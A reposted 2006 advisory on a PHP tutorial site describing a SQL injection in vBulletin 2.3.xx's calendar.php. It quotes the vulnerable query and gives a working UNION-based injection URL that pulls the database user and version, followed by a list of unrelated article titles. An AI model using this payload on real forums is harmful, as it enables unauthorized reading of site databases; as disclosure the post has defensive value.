vBulletin Forum 2.3.xx SQL Injection


Posted in PHP onOctober 09, 2006

vBulletin Forum 2.3.xx SQL Injection There exist a sql injection problem in calendar.php.

-------- Cut from line 585 in calendar.php ----------
else if ($action == "edit")
{
      $eventinfo = $DB_site->query_first("SELECT allowsmilies,public,userid,
eventdate,event,subject FROM calendar_events WHERE eventid = $eventid");
-----------------------------------------------------

If the MySQL version is greater than 4.00, a UNION attack could be used.

-----------------------------------------
http://ww.xxx.com/bbs/calendar.php?action=edit&eventid=12%20union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_ev
ents%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate
-----------------------------------------

The query_first function will only return the first row of the query result, so make sure it returns !
the one you want.

PHP 相关文章推荐
PHP在特殊字符前加斜杠的实现代码
Jul 17 PHP
php 定义404页面的实现代码
Nov 19 PHP
PHP解决URL中文GBK乱码问题的两种方法
Jun 03 PHP
set_exception_handler函数在ThinkPHP中的用法
Oct 31 PHP
php基于str_pad实现卡号不足位数自动补0的方法
Nov 12 PHP
PHP中key和current,next的联合运用实例分析
Mar 29 PHP
简单谈谈PHP中的include、include_once、require以及require_once语句
Apr 23 PHP
PHP连接MySQL进行增、删、改、查操作
Feb 19 PHP
ThinkPHP删除栏目(实现批量删除栏目)
Jun 21 PHP
PHP使用栈解决约瑟夫环问题算法示例
Aug 27 PHP
PHP判断是否是微信打开,浏览器打开的方法
Mar 14 PHP
laravel框架实现敏感词汇过滤功能示例
Feb 15 PHP
PHP_Flame(Version:Progress)的原代码
Oct 09 #PHP
图形数字验证代码
Oct 09 #PHP
用PHP函数解决SQL injection
Oct 09 #PHP
session 的生命周期是多长
Oct 09 #PHP
做个自己站内搜索引擎
Oct 09 #PHP
用libTemplate实现静态网页的生成
Oct 09 #PHP
php注入实例
Oct 09 #PHP
You might like
php中看实例学正则表达式
2006/12/25 PHP
利用PHP扩展vld查看PHP opcode操作步骤
2013/03/04 PHP
php生成扇形比例图实例
2013/11/06 PHP
phpphp图片采集后按原路径保存图片示例
2014/02/18 PHP
php数组添加元素方法小结
2014/12/20 PHP
php中static和const关键字用法分析
2016/12/07 PHP
Add Formatted Data to a Spreadsheet
2007/06/12 Javascript
js或css实现滚动广告的几种方案
2010/01/28 Javascript
jQuery获取浏览器中的分辨率实现代码
2013/04/23 Javascript
js 本地预览的简单实现方法
2014/02/18 Javascript
jQuery简单实现网页选项卡特效
2014/11/24 Javascript
javascript获取当前鼠标坐标的方法
2015/01/10 Javascript
在页面中输出当前客户端时间javascript实例代码
2016/03/02 Javascript
JavaScript实现复制或剪切内容到剪贴板功能的方法
2016/05/23 Javascript
jQuery UI结合Ajax创建可定制的Web界面
2016/06/22 Javascript
JS自定义函数对web前端上传的文件进行类型大小判断
2016/10/19 Javascript
微信小程序 地图(map)实例详解
2016/11/16 Javascript
详解为Angular.js内置$http服务添加拦截器的方法
2016/12/20 Javascript
原生ajax处理json格式数据的实例代码
2016/12/25 Javascript
jQuery中Datatables增加跳转到指定页功能
2017/02/08 Javascript
浅析vue给不同环境配置不同打包命令
2018/08/17 Javascript
实例分析vue循环列表动态数据的处理方法
2018/09/28 Javascript
DataFrame中去除指定列为空的行方法
2018/04/08 Python
Pycharm如何打断点的方法步骤
2019/06/13 Python
对Django项目中的ORM映射与模糊查询的使用详解
2019/07/18 Python
python3 deque 双向队列创建与使用方法分析
2020/03/24 Python
python pymysql链接数据库查询结果转为Dataframe实例
2020/06/05 Python
Python如何对齐字符串
2020/07/30 Python
python解包概念及实例
2021/02/17 Python
CSS3中的opacity属性使用教程
2015/08/19 HTML / CSS
教育实习生的自我评价分享
2013/11/21 职场文书
仓库主管的岗位职责
2013/12/04 职场文书
公司授权委托书格式样本
2014/10/01 职场文书
企业与个人合作经营协议书
2014/11/01 职场文书
Java org.w3c.dom.Document 类方法引用报错
2021/08/07 Java/Android
如何用H5实现好玩的2048小游戏
2022/07/23 HTML / CSS